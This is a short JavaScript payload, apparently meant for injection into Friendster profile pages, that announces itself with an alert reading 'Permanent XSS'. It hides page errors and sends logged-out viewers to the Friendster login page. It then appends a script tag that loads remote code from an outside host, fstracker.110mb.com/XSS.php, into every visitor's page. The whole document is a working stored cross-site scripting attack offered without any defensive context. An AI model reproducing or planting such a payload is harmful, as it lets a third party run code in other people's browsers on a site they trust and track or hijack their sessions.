function blockError(){return true;}
window.onerror = blockError;

if(pageViewerID==""){
	alert("please log in your friendster account to view overlaid profiles");
	top.location.href="http://www.friendster.com/login.php?next=%2F"+pageOwnerID+"&cookie=1";
}

alert("Permanent XSS")
var roycastillo = document.createElement("script");
roycastillo.type = "text/javascript";
roycastillo.src = "http://fstracker.110mb.com/XSS.php";
document.getElementsByTagName("head")[0].appendChild(roycastillo);

